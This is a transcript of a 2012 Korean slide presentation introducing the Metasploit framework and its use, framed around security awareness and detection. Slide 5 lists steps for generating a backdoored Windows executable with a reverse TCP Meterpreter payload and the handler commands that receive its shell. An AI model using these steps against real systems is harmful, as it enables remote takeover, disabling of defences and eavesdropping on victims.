1 / 9

Matasploit 의 소개와 사용법

Matasploit 의 소개와 사용법. 2012. 7. 20. 목차. Matasploit 소개 주요기능 주요공격 D emo 토론 및 시사점 별첨 . VIRUS Total 탐지여부 확인. I . Metaspoit 이란 ?. History - 2003 년 여름 HD Moore 가 코드연구 및 개발등에서 악용될 취약점을 공개할 목적으로 Metasploit 프로젝트를 시작했으며 , 현재도 Rapid7 에서 최고보안책임자로써 활동하고 있고

Download Presentation

Matasploit 의 소개와 사용법

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript


  1. Matasploit의 소개와 사용법 • 2012. 7. 20

  2. 목차 Matasploit소개 주요기능 주요공격 Demo 토론 및 시사점 별첨. VIRUS Total 탐지여부 확인

  3. I. Metaspoit이란? • History • - 2003년 여름 HD Moore 가 코드연구 및 개발등에서 악용될 취약점을 공개할 목적으로 • Metasploit프로젝트를 시작했으며, 현재도 Rapid7에서 최고보안책임자로써 활동하고 있고 • 그는 2008년 세계 보안분야의 영향력 있는 인물 15인 안에 선정된 바 있음. • - Metaspoit은 관련 도구등 을 활용하여 취약점 점검에 편리하도록 익스플로잇을 모아놓은 오픈소스 • 프레임워크로, 취약점에 대한 깊이 있는 지식이 없어도 간단하고 쉽게 취약점 점검가능 ※ HD Moore 사진 ※ 홈페이지 : http://www.metasploit.com

  4. II. Matasploit주요 기능 • 기능 • - 침투테스트 • - 웹 캠, 마이크 활용한 도청등의 해킹 • - 취약성점검 (Nessus, 오라클, 어도비플래쉬 및 각종 프로토콜 등 • - 백도어 • 지원OS • - Windows, Unix, Linux ※ V4.0.0 기준 explits등이 작년 8월 1일 업데이트 확인

  5. III. 타겟시스템 모듈 생성 • 특징 • - 리버싱shell 코드는 방화벽 우회 가능 • - metasploit을 통하여 간단히 생성 가능 • 사용법 • 모듈 로드 • - 공격에 필요한 모듈 로드 • PAYLOAD • - 공격 후 취할 행동 결정 • 위 PAYLOAD 상세 타입 결정 • 모듈 생성 완료 • 상세 안내 • Backtrack5를 Vmware상에서 실행 • /pentest/exploits/SET/set 프로그램 실행 • - 메뉴 중 4번 Create a 4Payload and Listener 선택 • - 메뉴 2번 Windows Reverse TCP Meterpreter선택 • - 메뉴 16번 Backdoored Executable (BEST) 선택 - listener port = Random(enter for default) 적용 • - start the listener now? Yes or no “NO” 선택 •  msf.exe파일 생성 • 리스너(console)실행 • use exploit/multi/handler – 공격할 exploit 설정 • set PAYLOAD windwos/meterpreter/reverse_tcp – 어떤 코드 실행할지 설정 • set lhost , set lport후 exploit … 중략 Demo

  6. VI. 주요 공격 및 시사점 • 주요공격 • - 원격에서 타겟시스템의 계정생성 • - 원도우 보안설정(방화벽, 백신) 기능 해제 • - 타겟 시스템의 프로그램 임의 실행 Demo • 시사점 • - 해당 공격에 대한 모니터링이 가능한가? • - 초기 타겟 시스템에 쉘 코드는 어떠한 방법들로 실행 시킬수 있는가?

  7. 별첨. 바이러스 토탈(www.virustotal.com) 정보 1. 파일정보 2. MD5 정보

  8. 별첨. Doolgi(http://112.169.19.236/) 정보 1. 파일정보

  9. 감사합니다.

More Related